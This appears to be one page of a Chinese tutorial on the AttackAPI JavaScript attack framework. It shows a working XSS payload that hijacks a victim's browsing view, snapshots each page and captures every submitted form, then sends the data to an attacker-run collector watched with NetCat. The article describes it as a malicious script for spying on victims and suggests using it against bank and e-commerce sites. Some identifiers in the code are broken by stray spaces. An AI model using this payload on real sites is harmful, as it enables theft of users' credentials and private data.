WEB开发网
开发学院网络安全安全技术 精通JavaScript攻击框架:AttackAPI(下) 阅读

精通JavaScript攻击框架:AttackAPI(下)

 2009-02-13 13:55:12 来源:WEB开发网   
核心提示: 执行该语句之前,返回系统提示符并让NetCat侦听端口8888,精通JavaScript攻击框架:AttackAPI(下)(8),具体做法如前所述,一切就绪后,以监视受害者的一举一动,您可能已经想到如果一个银行或者电子商务站点上有一个XSS矢量时,按下Run,几秒后

执行该语句之前,返回系统提示符并让NetCat侦听端口8888,具体做法如前所述。一切就绪后,按下Run。几秒后,将会看到当前视图是怎么替换成一个被劫持的页面的。来到cn.msn.com,同时注意你的NetCat屏幕。将会看到当前视图的一个快照。这时NetCat将关闭。重新启动它,继续冲浪。您将继续收到用户的动作快照。

当然,NetCat不是收集这种类型的信息的最佳对象。您可能需要脚本之类的东西来保存这种类型的信息。现在让我们为我们的脚本添加更多的功能。利用下列表达式,我们就能够监视所有用户发来的页面和表单:

$A.hijackView({
onload: function () {
try {
var hijackedDocument = $A.getDocument(this);
var query = {};
query[‘snapshot_’ + new Date().getTime()] =
hijackedDocument.body.innerHTML;
$A.transport({url: ‘http://127.0.0.1:8888/collect.php’,
query: query});
for (var form in doc.forms)
$A.hijackForm({form: form, onsubmit: function () {
var fi elds = {};
for (var fi eld in this.fi elds)
fi elds[fi eld] = this.fi elds[fi eld];
var query = {};
query[‘form_’ + new Date().getTime()] =
$A.buildQuery(fi elds);
$A.transport({url: ‘http://127.0.0.1:8888/
collect.php’, query: query});
}});
} catch(e) {}
}
});

这个语句会产生一个恶意脚本,以监视受害者的一举一动。您可能已经想到如果一个银行或者电子商务站点上有一个XSS矢量时,类似的脚本会带来多么严重的后果。

上一页  3 4 5 6 7 8 9  下一页

Tags:精通 JavaScript 攻击

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接